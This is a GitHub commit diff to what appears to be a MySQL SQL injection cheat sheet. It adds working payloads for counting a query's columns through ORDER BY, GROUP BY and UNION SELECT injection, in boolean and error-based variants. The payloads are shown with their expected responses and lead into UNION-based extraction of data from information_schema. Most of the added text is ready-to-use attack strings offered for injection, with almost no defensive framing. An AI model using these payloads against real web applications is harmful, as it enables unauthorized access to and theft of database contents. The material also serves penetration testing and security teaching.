Added More Ways to Detect columns number

using order by or group by
using order by or group by error based
using UNION SELECT Error Based
This commit is contained in:
nizam0906 2019-10-29 16:32:22 +05:30 committed by GitHub
parent bb2c247160
commit f81f9440b8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -3,8 +3,8 @@
## Summary
* [MYSQL Comment](#mysql-comment)
* [Detect columns number](#detect-columns-number)
* [MYSQL Union Based](#mysql-union-based)
* [Detect columns number](#detect-columns-number)
* [Extract database with information_schema](#extract-database-with-information-schema)
* [Extract data without information_schema](#extract-data-without-information-schema)
* [Extract data without columns name](#extract-data-without-columns-name)
@ -46,17 +46,56 @@
## MYSQL Union Based
### Extract database with information_schema
### Detect columns number
First you need to know the number of columns, you can use `order by`.
First you need to know the number of columns
#### using `order by` or `group by`
Keep incrementing the number until you get a False response.
Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
```sql
order by 1
order by 2
order by 3
...
order by XXX
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True
1' ORDER BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
```
or
```sql
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True
1' GROUP BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
```
#### using `order by` or `group by` Error Based
Similar to the previous method, we can check the number of columns with 1 request if error showing is enabled.
```sql
1' ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+
# Unknown column '4' in 'order clause'
# This error means query uses 3 column
#-1' UNION SELECT 1,2,3--+ True
```
or
```sql
1' GROUP BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+
# Unknown column '4' in 'group statement'
# This error means query uses 3 column
#-1' UNION SELECT 1,2,3--+ True
```
#### using `UNION SELECT` Error Based
This method works if error showing is enabled
```sql
1' UNION SELECT @--+ #The used SELECT statements have a different number of columns
1' UNION SELECT @,@--+ #The used SELECT statements have a different number of columns
1' UNION SELECT @,@,@--+ #No error means query uses 3 column
#-1' UNION SELECT 1,2,3--+ True
```
### Extract database with information_schema
Then the following codes will extract the databases'name, tables'name, columns'name.